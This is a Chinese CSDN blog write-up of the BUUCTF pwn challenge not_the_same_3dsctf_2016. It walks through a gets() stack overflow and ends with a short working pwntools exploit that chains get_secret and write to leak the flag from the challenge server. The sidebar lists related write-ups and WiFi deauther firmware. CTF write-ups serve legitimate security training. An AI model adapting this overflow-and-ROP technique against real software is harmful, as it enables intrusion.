[BUUCTF-pwn]——not_the_same_3dsctf_2016

最新推荐文章于 2023-12-03 16:46:29 发布
最新推荐文章于 2023-12-03 16:46:29 发布
阅读量713 收藏 4
点赞数 5
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113785370
版权

not_the_same_3dsctf_2016

  • 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016
    首先checksec一下,看看32位程序
    在这里插入图片描述
    在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp在这里插入图片描述
    shift+F12看下,发现了flag.txt这种敏感 字符串
    在这里插入图片描述
    在这里插入图片描述
    找到调用的函数get_secret函数
    在这里插入图片描述
    函数调用后,flag储存在fl4g里面,我们找到fl4g的位置
    在这里插入图片描述
    找到可以输出的write函数
    在这里插入图片描述
    下面我们就可以写我们的exploit了

exploit

from pwn import *
p = remote("node3.buuoj.cn",25722)
write_addr = 0x0806E270
flag_addr = 0x080ECA2D 
get_secret = 0x080489A0
payload='a'* 0x2d + p32(get_secret) + p32(write_addr) + p32(0) + p32(1) + p32(flag_addr) + p32(45)
p.sendline(payload)
p.interactive()

嘻嘻,如果有帮助的话,可以点个赞哦 😃

当然,打赏就更加谢谢各位了,一分钱你买不了吃亏.嘿嘿🤭

Y-peak
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
vhe.rar_At the Same Time
09-23
Multi-threaded mode at the same time a number of tasks
not_the_same_3dsctf_2016
m0_52231248的博客
11-09 186
not_the_same_3dsctf_2016 Ubuntu16 checksec一下 ida: Gets函数存在溢出点offest=0x2d Main函数上面就是后门函数,给我们将flag.txt读入bss段 找到读入的flag地址 我们只需要printf打印一下就行了 远端还需要我们正常退出函数,找一下exit() 因为是静态编译的,所以基本所有函数都会有直接构造exp: from pwn import* context(log_level="deb.
not_the_same_3dsctf_2016 wp (python3)
Kata_Jhin的博客
03-14 136
not_the_same_3dsctf_2016 wp (python3)
【BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 317
【BUUCTF - PWN】not_the_same_3dsctf_2016题解
【CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3714
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
not_the_same_3dsctf_2016【简单解法和mprotect解法】
qq_41696518的博客
08-29 647
not_the_same_3dsctf_2016,含mprotect解法和常规解法
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 513
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1534
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1195
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
[BUUCTF]PWN14——not_the_same_3dsctf_2016
mcmuyanga的博客
08-29 1847
[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤: 例行检查,32位,开启了nx保护 nc一下看看程序大概的执行情况,没看出个所以然 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 176
本题目本地与远程得用两种方案打。
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 288
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
[BUUCTF]-PWN:not_the_same_3dsctf_2016解析
最新发布
2301_79326813的博客
12-03 382
答:这里跟exit没有太大关系,不是exit也行,但printf和flag_addr的隔一个是printf函数在32位的调用规则,也就是通过栈传参,64位与32位不同,64位是前6个参数通过寄存器传参,因此payload的书写也不同,这个需要注意。答:printf从缓冲区打印出东西需要满足条件,比如有换行符或缓冲区已满或程序退出,如果不满足条件flag无法被打印出来。答:因为这里没有rbp,在main函数的汇编界面就可以看到程序并没有把rbp推入,所以不用覆盖rbp。问题1:为什么填充45个字符?
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值